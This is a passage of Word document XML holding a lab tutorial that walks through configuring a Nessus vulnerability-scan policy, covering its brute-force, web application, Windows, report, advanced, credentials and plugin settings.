          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ASSESSMENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module, it will show you the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>General</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> settings where you can see the Accuracy, Antivirus definition grace period, and SMTP options. Here you can leave the settings to default, and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Brute Force</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> from the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE0E13" w14:textId="41B67AD2"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CF055F" wp14:editId="2681195B">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1579320726" name="図 3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3F9ECA2A" w14:textId="0E815DCE"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520DF8BC">
          <v:shape id="_x0000_i1288" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId47" w:name="DefaultOcxName20" w:shapeid="_x0000_i1288"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the Brute Force settings, make sure that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Only use credentials provided by the user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> option is checked under General Settings section, and then, click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module in the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE903D" w14:textId="546B247E"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7D0C1B5C" wp14:editId="669A9C4D">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="658413022" name="図 3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2EB04BFA" w14:textId="072F812F"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54829B2C">
          <v:shape id="_x0000_i1287" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId49" w:name="DefaultOcxName21" w:shapeid="_x0000_i1287"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the Web Application module, if you have any web applications hosted on the network, turn it </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> or leave the settings to default, and then click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module from the left pane. In this lab, we have left the settings to default (Turned off) as there is no web application hosted on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5F8B2A" w14:textId="77777777" w:rsidR="00D86EB7" w:rsidRPr="00D86EB7" w:rsidRDefault="00D86EB7" w:rsidP="00D86EB7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE0E0"/>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t xml:space="preserve">You can turn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> the by toggling the Scan web applications switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A9FD4" w14:textId="183A1115"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3187BF7A" wp14:editId="3381DE4D">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121551699" name="図 3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6D824C1F" w14:textId="60095861"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3FC972A7">
          <v:shape id="_x0000_i1286" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId51" w:name="DefaultOcxName22" w:shapeid="_x0000_i1286"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module, make sure that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Request Information about the SMB Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is checked, and leave the other settings to default. Now click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module from the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF45BC" w14:textId="6696E94F"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E404783" wp14:editId="5343AED4">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="531235362" name="図 3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71131C87" w14:textId="668B7533"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="73043412">
          <v:shape id="_x0000_i1285" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId53" w:name="DefaultOcxName23" w:shapeid="_x0000_i1285"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module, leave all the settings to default and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ADVANCED</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> from the left pane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A6214" w14:textId="46352099"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034E7B52" wp14:editId="65854F03">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2090552571" name="図 3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2BD156A2" w14:textId="14A48FDC"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74DDB81A">
          <v:shape id="_x0000_i1284" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId55" w:name="DefaultOcxName24" w:shapeid="_x0000_i1284"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Advanced</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module, scroll down to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Performance Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section and set the value for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Max simultaneous hosts per scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Max number of concurrent TCP sessions per host</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unlimited</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Max number of concurrent TCP sessions per scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>unlimited</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. After configuring these options, scroll up the window and click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F555A1" w14:textId="4424E54A"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78ECA9F1" wp14:editId="203C4B63">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1834015569" name="図 3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16E2ADA0" w14:textId="43DC9B18"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2A407412">
          <v:shape id="_x0000_i1283" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId57" w:name="DefaultOcxName25" w:shapeid="_x0000_i1283"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module, it will display the Cloud Services, Database, Host, Miscellaneous, and Plaintext Authentication options. Here you can activate these options by choosing them from the left pane. In this lab, we have kept the settings to default. Now, click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Plugins</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module to view the available plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B8614" w14:textId="7A5E7CF3"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05B19136" wp14:editId="618D0750">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="502974184" name="図 3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4DC37486" w14:textId="413A8445"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081C80B7">
          <v:shape id="_x0000_i1282" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId59" w:name="DefaultOcxName26" w:shapeid="_x0000_i1282"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Plugins</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> module, Nessus display all the plugins and their information. Here you may choose plugins according to your target network and then, click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Save</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> button to save the new policy. In this lab, we are not selecting any plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A088D" w14:textId="1F308CA3"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48829385" wp14:editId="183AB4A3">
            <wp:extent cx="5400040" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="960440686" name="図 3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3F06FB30" w14:textId="0C52D4DB"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="54622125">
          <v:shape id="_x0000_i1281" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId61" w:name="DefaultOcxName27" w:shapeid="_x0000_i1281"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Now the created policy is saved in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D86EB7">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> section as shown in the screenshot below:</w:t>
      </w:r>
    </w:p>
